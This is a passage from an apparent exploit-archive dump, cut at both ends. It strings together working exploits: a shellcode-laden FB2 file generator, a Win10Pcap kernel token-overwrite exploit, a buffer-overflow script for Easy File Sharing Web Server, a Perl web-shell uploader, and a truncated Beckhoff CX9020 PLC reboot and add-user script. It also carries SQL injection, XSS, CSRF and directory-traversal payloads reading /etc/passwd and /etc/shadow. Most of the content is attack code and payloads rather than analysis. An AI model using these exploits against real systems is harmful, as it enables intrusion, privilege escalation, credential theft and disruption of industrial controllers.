fuz_text += '\x90' * 16                         # NOP's :-)


fuz_text += shellcode








##############################################################################################
fuz_text += '\x41' * 6000                       # final junk


################################ GENERATE utf-16 fb2 file ####################################

start = '''
<?xml version="1.0" encoding="unicode-utf_16"?>
<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
  <description>
    <title-info>
      <author>
        <first-name> 
    '''

end   = '''
   <middle-name/>
        <last-name/>
      </author>
      <book-title>EXPLOIT TEST</book-title>
	 </title-info>
    </description>
</FictionBook>
'''
start_u = start.encode('utf-16')

end_u = end.encode('utf-16')

fout = open(file_result, 'wb')
fout.write(start_u)
fout.close()

fout = open(file_result,'ab')
fout.write(fuz_text)
fout.close()

fout = open(file_result,'ab')
fout.write(end_u)
fout.close()


print "[*] File successfully created !!\n\n"
HireHackking 
// Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit

#include <stdio.h>
#include <tchar.h>
#include<Windows.h>
#include<stdio.h>
#include <winternl.h>
#include <intrin.h>
#include <psapi.h>
#include <strsafe.h>
#include <assert.h>

#define	SL_IOCTL_GET_EVENT_NAME		CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
#define STATUS_SUCCESS					((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH		((NTSTATUS)0xc0000004L)

/* found with :
!token 
1: kd> dt nt!_OBJECT_HEADER
   +0x000 PointerCount     : Int4B
   +0x004 HandleCount      : Int4B
   +0x004 NextToFree       : Ptr32 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : UChar
   +0x00d TraceFlags       : UChar
   +0x00e InfoMask         : UChar
   +0x00f Flags            : UChar
   +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : Ptr32 Void
   +0x014 SecurityDescriptor : Ptr32 Void
   +0x018 Body             : _QUAD

TypeIndex is 0x5
*/
#define HANDLE_TYPE_TOKEN				0x5


// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
const SYSTEM_INFORMATION_CLASS SystemHandleInformation = 
(SYSTEM_INFORMATION_CLASS)16;

// The NtQuerySystemInformation function and the structures that it returns 
// are internal to the operating system and subject to change from one 
// release of Windows to another. To maintain the compatibility of your 
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
	IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
	OUT PVOID SystemInformation,
	IN ULONG SystemInformationLength,
	OUT PULONG ReturnLength OPTIONAL
	);

// Undocumented structure: SYSTEM_HANDLE_INFORMATION
typedef struct _SYSTEM_HANDLE 
{
	ULONG ProcessId;
	UCHAR ObjectTypeNumber;
	UCHAR Flags;
	USHORT Handle;
	PVOID Object;
	ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION 
{
	ULONG NumberOfHandles;
	SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;


// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
const FILE_INFORMATION_CLASS FileNameInformation = 
(FILE_INFORMATION_CLASS)9;

// The NtQueryInformationFile function and the structures that it returns 
// are internal to the operating system and subject to change from one 
// release of Windows to another. To maintain the compatibility of your 
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
	IN HANDLE FileHandle,
	OUT PIO_STATUS_BLOCK IoStatusBlock,
	OUT PVOID FileInformation,
	IN ULONG Length,
	IN FILE_INFORMATION_CLASS FileInformationClass
	);

// FILE_NAME_INFORMATION contains name of queried file object.
typedef struct _FILE_NAME_INFORMATION {
	ULONG FileNameLength;
	WCHAR FileName[1];
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;


void* FindTokenAddressHandles(ULONG pid)
{
	/////////////////////////////////////////////////////////////////////////
	// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
	// 

	// The functions have no associated import library. You must use the 
	// LoadLibrary and GetProcAddress functions to dynamically link to 
	// ntdll.dll.

	HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
	assert(hNtDll != NULL);

	PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = 
		(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll, 
		"NtQuerySystemInformation");
	assert(NtQuerySystemInformation != NULL);


	/////////////////////////////////////////////////////////////////////////
	// Get system handle information.
	// 

	DWORD nSize = 4096, nReturn;
	PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
		HeapAlloc(GetProcessHeap(), 0, nSize);

	// NtQuerySystemInformation does not return the correct required buffer 
	// size if the buffer passed is too small. Instead you must call the 
	// function while increasing the buffer size until the function no longer 
	// returns STATUS_INFO_LENGTH_MISMATCH.
	while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, 
		nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
	{
		HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
		nSize += 4096;
		pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
			GetProcessHeap(), 0, nSize);
	}

	for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
	{

		PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);

		if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
		{
			printf(" ObjectTypeNumber %d , ProcessId %d , Object  %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
			return pHandle->Object;
		}
	}

	/////////////////////////////////////////////////////////////////////////
	// Clean up.
	// 
	HeapFree(GetProcessHeap(), 0, pSysHandleInfo);

	return 0;
}

void main()
{
	DWORD dwBytesReturned;
	DWORD ShellcodeFakeMemory;
	HANDLE token;


	// first create toke handle so find  object address with handle 
	if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
		DebugBreak();
	
	void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());

	CloseHandle(token);

	// i dont want write fully weaponized exploit so criminal must write code to find  "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)  
	HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
  if(hDriver!=INVALID_HANDLE_VALUE)
  {
	   fprintf(stderr," Open Driver OK\n");

	  if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
	  {
		  fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
		  return;
	  }
	  else  fprintf(stderr," Send IOCTL OK\n");
  }

  else 
  {
	  fprintf(stderr," Open Driver error %d.\n",GetLastError());
	  return;
  }


  CloseHandle(hDriver);
  getchar();

}
HireHackking 
Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities


Vendor: Realtyna LLC
Product web page: https://www.realtyna.com
Affected version: 8.9.2

Summary: Realtyna CRM (Client Relationship Management) Add-on
for RPL is a Real Estate CRM specially designed and developed
based on business process and models required by Real Estate
Agents/Brokers. Realtyna CRM intends to increase the Conversion
Ratio of the website Visitors to Leads and then Leads to Clients.


Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site. Multiple cross-site scripting vulnerabilities
were also discovered. The issue is triggered when input passed
via the multiple parameters is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in
context of an affected site.

Tested on: Apache
           PHP/5.4.38
		   MySQL/5.5.42-cll

Vulnerability discovered by Bikramaditya 'PhoenixX' Guha


Advisory ID: ZSL-2015-5271
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
CVE ID: CVE-2015-7715
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715


05.10.2015

--


1. CSRF:

<html lang="en">
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://localhost/administrator/index.php" id="formid" method="post">
<input type="hidden" name="option" value="com_rpl" />
<input type="hidden" name="view" value="addon_membership_members" />
<input type="hidden" name="format" value="ajax" />
<input type="hidden" name="function" value="add_user" />
<input type="hidden" name="id" value="85" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>


2. Cross Site Scripting (Stored):

http://localhost/administrator/index.php
POST parameters: new_location_en_gb, new_location_fr_fr

Payloads:

option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location
HireHackking 
Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities


Vendor: Realtyna LLC
Product web page: https://www.realtyna.com
Affected version: 8.9.2

Summary: Realtyna CRM (Client Relationship Management) Add-on
for RPL is a Real Estate CRM specially designed and developed
based on business process and models required by Real Estate
Agents/Brokers. Realtyna CRM intends to increase the Conversion
Ratio of the website Visitors to Leads and then Leads to Clients.


Desc: Realtyna RPL suffers from multiple SQL Injection vulnerabilities.
Input passed via multiple POST parameters is not properly sanitised
before being returned to the user or used in SQL queries. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Tested on: Apache
           PHP/5.4.38
		   MySQL/5.5.42-cll	

Vulnerability discovered by Bikramaditya 'PhoenixX' Guha


Advisory ID: ZSL-2015-5272
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5272.php
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
CVE ID: CVE-2015-7714
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7714


05.10.2015

--


http://localhost/administrator/index.php
POST parameters: id, copy_field, pshow, css, tip, cat_id, text_search, plisting, pwizard

Payloads:

- option=com_rpl&view=addon_membership_members&format=edit&id=84'
- option=com_rpl&view=property_structure&format=ajax&function=new_field&id=3004'&type=text
- option=com_rpl&view=rpl_multilingual&format=ajax&function=data_copy&copy_field=308'&copy_from=&copy_to=en_gb&copy_method=1
- option=com_rpl&view=property_structure&format=ajax&function=update_field&id=3002&options=0&css=&tip=&style=&name=&cat_id=1&text_search=0&plisting=0&pshow=1'&pwizard=1&mode=add
HireHackking 
#!/usr/bin/env python
# Easy File Sharing Web Server v7.2 Remote SEH Based Overflow
# The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX
# vulnerable file /changeuser.ghp > Cookies UserID=[buf]
# Means there are two ways to exploit changeuser.ghp
# Tested on Win7 x64 and x86, it should work on win8/win10
# By Audit0r
# https://twitter.com/Audit0rSA


import sys, socket, struct
 

if len(sys.argv) <= 1:
    print "Usage: python efsws.py [host] [port]"
    exit()
 
host = sys.argv[1]    
port = int(sys.argv[2])


# https://code.google.com/p/win-exec-calc-shellcode/
shellcode = (

"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +

"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +

"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +

"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +

"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +

"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +

"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +

"\x1c\x39\xbd"

)

print "[+]Connecting to" + host


craftedreq =  "A"*4059

craftedreq += "\xeb\x06\x90\x90"     		 # basic SEH jump

craftedreq += struct.pack("<I", 0x10017743)      # pop commands from ImageLoad.dll                         

craftedreq += "\x90"*40                          # NOPer

craftedreq += shellcode                         

craftedreq += "C"*50                             # filler



httpreq = (

"GET /changeuser.ghp HTTP/1.1\r\n"

"User-Agent: Mozilla/4.0\r\n"

"Host:" + host + ":" + str(port) + "\r\n"

"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"

"Accept-Language: en-us\r\n"

"Accept-Encoding: gzip, deflate\r\n"

"Referer: http://" + host + "/\r\n"

"Cookie: SESSIONID=6771; UserID=" + craftedreq + "; PassWD=;\r\n"

"Conection: Keep-Alive\r\n\r\n"
)


print "[+]Sending the Calc...."

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host, port))

s.send(httpreq)

s.close()
HireHackking 
{-} Title => Subrion 3.X.X - Multiple Exploits

{-} Author => bRpsd (skype: vegnox)

{-} Date Release => 23 October, 2015


{-} Vendor => Subrion
    Homepage => http://www.subrion.org/
	Download => http://tools.subrion.org/get/latest.zip
	Vulnerable Versions => 3.X.X
	Tested Version => Latest, 3.3.5 on a Wamp Server.

{x} Google Dork:: 1 => "© 2015 Powered by Subrion CMS"
{x} Google Dork:: 2 => "Powered by Subrion CMS"

--------------------------------------------------------------------------------------------------------------------------------
The installation folder never get deleted or protected unless you deleted it yourself.
Which let any unauthorized user access the installation panel and ruin your website in just a few steps ..
--------------------------------------------------------------------------------------------------------------------------------


#######################################################################################
Vulnerability #1 : Reset Administrator Password & Database settings
Risk: High
File Path: http://localhost/cms/install/install/configuration/
#######################################################################################



#######################################################################################
Vulnerability #2 : Arbitrary File Download + Full Path Disclouser 
Risk: Medium
File Path: http://localhost/cms/install/install/download/
Method: POST
Parameter (for file contents) : config_content
#######################################################################################


#######################################################################################
Vulnerability #3 : Unauthorized Arbitrary Plugins Installer 
Risk: Medium
File Path: http://localhost/cms/install/install/plugins/
#######################################################################################


** SOLUTION ** ! :
Solution for all vulnerabilities is to delete the file located at:
/install/modules/module.install.php


H@PPY H@CK1NG !
HireHackking 
source: https://www.securityfocus.com/bid/60150/info

Matterdaddy Market is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Matterdaddy Market 1.4.2 is vulnerable; other version may also be affected.

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|====================================================|
|=   Matterdaddy Market 1.4.2 File Uploader Fuzzer   |
|=         >> Provided By KedAns-Dz <<               |
|=          e-mail : ked-h[at]hotmail.com            |
|====================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
    chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
    chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
        Content_Type => 'multipart/form-data',
        Content      =>
            [
        'md_title' => '1337day',
        'md_description' => 'Inj3ct0r Exploit Database',
        'md_price' => '0',
        'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
        'city' => 'Hassi Messaoud',
        'namer' => 'KedAns-Dz',
        'category' => '4',
        'filetoupload' => $file,
    'filename' => 'k3dsh3ll.php;.jpg',
 # to make this exploit as sqli change file name to :
 # k3dsh3ll' [+ SQLi +].php.jpg
 # use temperdata better ;)
        ] );
print "\n";
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
    else { print "[!] Check your email and confirm u'r post! \n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;
HireHackking 
source: https://www.securityfocus.com/bid/60089/info

Weyal CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6

http://www.example.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14

http://www.example.com/countrys.php?countryid=-999 union all select 1,version(),database()
HireHackking 
source: https://www.securityfocus.com/bid/60010/info

thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue will allow an attacker to view arbitrary local files within the context of the web server. Information harvested may aid in launching further attacks. 

www.example.com/../../../../../../../../etc/passwd

www.example.com/../../../../../../../../etc/shadow
HireHackking 
/*
source: https://www.securityfocus.com/bid/60004/info

The RRDtool module for Python is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input.

An attacker may exploit this issue to execute arbitrary code within the context of the affected application or to crash the application.

RRDtool 1.4.7 is affected; other versions may also be vulnerable. 
*/

#include <stdio.h>  
#include <errno.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sys/time.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <stdarg.h>  
#include <string.h>  
#define DFLTHOST     "www.example.com"  
#define DFLTPORT     5501  
#define MAXMSG          256  
#define fgfsclose     close  
void init_sockaddr(struct sockaddr_in *name, const char *hostname, unsigned port);  
int fgfswrite(int sock, char *msg, ...);  
const char *fgfsread(int sock, int wait);  
void fgfsflush(int sock);  
int fgfswrite(int sock, char *msg, ...)  
{  
  va_list va;  
  ssize_t len;  
  char buf[MAXMSG];  
  va_start(va, msg);  
  vsnprintf(buf, MAXMSG - 2, msg, va);  
  va_end(va);  
  printf("SEND: \t<%s>\n", buf);  
  strcat(buf, "\015\012");  
  len = write(sock, buf, strlen(buf));  
  if (len < 0) {  
       perror("fgfswrite");  
       exit(EXIT_FAILURE);  
  }  
  return len;  
}  
const char *fgfsread(int sock, int timeout)  
{  
  static char buf[MAXMSG];  
  char *p;  
  fd_set ready;  
  struct timeval tv;  
  ssize_t len;  
  FD_ZERO(&ready);  
  FD_SET(sock, &ready);  
  tv.tv_sec = timeout;  
  tv.tv_usec = 0;  
  if (!select(32, &ready, 0, 0, &tv))  
       return NULL;  
  len = read(sock, buf, MAXMSG - 1);  
  if (len < 0) {  
       perror("fgfsread");  
       exit(EXIT_FAILURE);  
  }   
  if (len == 0)  
       return NULL;  
  for (p = &buf[len - 1]; p >= buf; p--)  
       if (*p != '\015' && *p != '\012')  
            break;  
  *++p = '\0';  
  return strlen(buf) ? buf : NULL;  
}  
void fgfsflush(int sock)  
{  
  const char *p;  
  while ((p = fgfsread(sock, 0)) != NULL) {  
       printf("IGNORE: \t<%s>\n", p);  
  }  
}  
int fgfsconnect(const char *hostname, const int port)  
{  
  struct sockaddr_in serv_addr;  
  struct hostent *hostinfo;  
  int sock;  
  sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);  
  if (sock < 0) {  
       perror("fgfsconnect/socket");  
       return -1;  
  }  
  hostinfo = gethostbyname(hostname);  
  if (hostinfo == NULL) {  
       fprintf(stderr, "fgfsconnect: unknown host: \"%s\"\n", hostname);  
       close(sock);  
       return -2;  
  }  
  serv_addr.sin_family = AF_INET;  
  serv_addr.sin_port = htons(port);  
  serv_addr.sin_addr = *(struct in_addr *)hostinfo->h_addr;  
  if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {  
       perror("fgfsconnect/connect");  
       close(sock);  
       return -3;  
  }  
  return sock;  
}  
int main(int argc, char **argv)  
{  
  int sock;  
  unsigned port;  
  const char *hostname, *p;  
 int i;  
  hostname = argc > 1 ? argv[1] : DFLTHOST;  
  port = argc > 2 ? atoi(argv[2]) : DFLTPORT;  
  sock = fgfsconnect(hostname, port);  
  if (sock < 0)  
       return EXIT_FAILURE;  
  fgfswrite(sock, "data");  
 fgfswrite(sock, "set /sim/rendering/clouds3d-enable true");  
 fgfswrite(sock, "set /environment/clouds");  
 for (i=0; i < 5; i++) {  
       fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cu/cloud/name %%n", i);  
       fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cb/cloud/name %%n", i);  
       fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ac/cloud/name %%n", i);  
       fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/st/cloud/name %%n", i);  
       fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ns/cloud/name %%n", i);  
 }  
  p = fgfsread(sock, 3);  
  if (p != NULL)  
       printf("READ: \t<%s>\n", p);  
 for (i=0; i < 5; i++) {  
       fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage scattered", i);  
       fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage cirrus", i);  
       fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage clear", i);  
 }  
 p = fgfsread(sock, 3);  
  if (p != NULL)  
       printf("READ: \t<%s>\n", p);  
  fgfswrite(sock, "quit");  
  fgfsclose(sock);  
  return EXIT_SUCCESS;  
}
HireHackking 
source: https://www.securityfocus.com/bid/59934/info

Jojo CMS is prone to an SQL-injection vulnerability because it fails to sanitize user-supplied input.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Jojo CMS 1.2 is vulnerable; other versions may also be affected. 

POST /articles/test/ HTTP/1.1
X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' -- 
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
name=name&email=user%40mail.com&website=&anchortext=&comment=comment&submit=Post+Comment
HireHackking 
source: https://www.securityfocus.com/bid/59940/info

The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

WP cleanfix 2.4.4 is vulnerable; other versions may also be affected. 

SRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpCleanFixAjax" />
      <input type="hidden" name="command" value="echo&#32;phpversion&#40;&#41;&#59;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/59933/info

Jojo CMS is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Jojo CMS 1.2 is vulnerable; other versions may also be affected. 

<form action="http://www.example.com/forgot-password/" method="post">
<input type="hidden" name="search" value='<script>alert(document.cookike);</script>'>
<input type="submit" id="btn">
</form>
HireHackking 
source: https://www.securityfocus.com/bid/59932/info

The Mail On Update plugin for WordPress is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

Mail On Update 5.1.0 is vulnerable; prior versions may also be affected. 

<html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update"; method="post" 
class="buttom-primary">
<input name="mailonupdate_mailto" type="hidden" value="example0 () example com
example1 () example com
example2 () example com
example3 () example com
example4 () example com
example5 () example com
example6 () example com
example7 () example com
example8 () example com
example9 () example com
example10 () example com
henri+monkey () nerv fi" />
<input name="submit" type="submit" value="Save"/></form></html>
HireHackking 
source: https://www.securityfocus.com/bid/59928/info

Open Flash Chart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 

http://ww.example.com/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()
HireHackking 
source: https://www.securityfocus.com/bid/59886/info

The wp-FileManager plugin for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. 

http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
HireHackking 
#!/usr/bin/env python
'''
    # Exploit Title: Beckhoff CX9020 CPU Module Web Exploit (RCE)
    # Date: 2015-10-22
    # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be, based on work by Frank Lycops (frank.lycops@thesecurityfactory.be)
    # Vendor Homepage: https://www.beckhoff.com/english.asp?embedded_pc/cx9020.htm
    # Version: TwinCat UpnpWebsite < 3.1.4018.13, fixed with ftp://ftp.beckhoff.com/software/embPC-Control/CX90xx/CX9020/CE/TC3/CX9020_CB3011_WEC7_HPS_v602i_TC31_B4018.13.zip
    # Tested on: Python runs on any Windows or Linux
    # CVE : CVE-2015-4051 (similar to this CVE, but different service IPC Diagnostics Authentication <> Web Authentication)

    Copyright 2015 Photubias(c)

    Written for Howest(c) University College, Ghent University, XiaK

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

File name CX9020-WebControl.py
written by tijl[dot]deneut[at]howest[dot]be
This POC allows to reboot any CX9020 PLC and add random (Web) users to be configured.
 -> Test by going to http://<IP>/config (redirects to http://<NAME>:5120/UpnpWebsite/index.htm)
 -> Default credentials are guest/1 and webguest/1, but this exploit works without credentials
 -> Verify Website version by logging into http://<IP>/config and clicking "TwinCAT"
'''
import sys, httplib, socket, re, base64

## Defining Functions first:
def rebootMachine(UNS, IP, IO):
        ## This is the SOAP Message:
        SoapMessage = "<?xml version=\"1.0\" encoding=\"utf-8\"?><s:Envelope s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\">"
        SoapMessage += "<s:Body><u:Write xmlns:u=\"urn:beckhoff.com:service:cxconfig:1\"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup>"
        SoapMessage += "<IndexOffset>-" + IO + "</IndexOffset>"
        SoapMessage += "<pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>"

        ## Construct and send the HTTP POST header
        rebootwebservice = httplib.HTTP(IP + ":5120")
        rebootwebservice.putrequest("POST", "/upnpisapi?uuid:" + UNS + "+urn:beckhoff.com:serviceId:cxconfig")
        rebootwebservice.putheader("Host", IP + ":5120")
        rebootwebservice.putheader("User-Agent", "Tijls Python Script")
        rebootwebservice.putheader("Content-type", "text/xml; charset=utf-8")
        rebootwebservice.putheader("Content-length", "%d" % len(SoapMessage))
        rebootwebservice.putheader("SOAPAction", "urn:beckhoff.com:service:cxconfig:1#Write")
        rebootwebservice.endheaders()
        rebootwebservice.send(SoapMessage)

        ## Get the response
        statuscode, statusmessage, header = rebootwebservice.getreply()
        if statuscode == 200:
                print "Exploit worked, device should be rebooting!"
                return 1
        else:
                print "Something went wrong, the used index is probably wrong? This is the response code:"
                ## Printing HTTP Response code
                res = rebootwebservice.getfile().read()
                print res
                return 0

        #print "Response: ", statuscode, statusmessage
        #print "headers: ", header

def addUser(UNS, IP, PDATA, IO):
        ## This is the SOAP Message:
        SoapMessage = '<?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
        SoapMessage += '<s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup>'
        SoapMessage += '<IndexOffset>-' + IO + '</IndexOffset>'
        SoapMessage += '<pData>' + PDATA + '</pData></u:Write></s:Body></s:Envelope>'

        ## Construct and send the HTTP POST header
        rebootwebservice = httplib.HTTP(IP + ":5120")
        rebootwebservice.putrequest("POST", "/upnpisapi?uuid:" + UNS + "+urn:beckhoff.com:serviceId:cxconfig")
        rebootwebservice.putheader("Host", IP + ":5120")
        rebootwebservice.putheader("User-Agent", "Tijls Python Script")
        rebootwebservice.putheader("Content-type", "text/xml; charset=utf-8")
        rebootwebservice.putheader("Content-length", "%d" % len(SoapMessage))
        rebootwebservice.putheader("SOAPAction", "urn:beckhoff.com:service:cxconfig:1#Write")
        rebootwebservice.endheaders()
        rebootwebservice.send(SoapMessage)

        ## Get the response
        statuscode, statusmessage, header = rebootwebservice.getreply()
        if statuscode == 200:
                print "Exploit worked, user is added!"
                return 1
        else:
                print "Something went wrong, the used index is probably wrong? This is the response code:"
                ## Printing HTTP Response code
                res = rebootwebservice.getfile().read()
                print res
                return 0

        #print "Response: ", statuscode, statusmessage
        #print "headers: ", header

def addOwnUser(UNS, IP, IO):
        ## This will prompt for username and password and then create the custom pData string
        USERNAME = raw_input("Please enter the username: ")
        PASSWORD = raw_input("Please enter the password: ")
        CONCATENATED = USERNAME + PASSWORD        
        
        # Creating the Full String to encode
        FULLSTRING = chr(16+len(CONCATENATED))
        FULLSTRING += chr(0)+chr(0)+chr(0)
        FULLSTRING += chr(len(USERNAME))
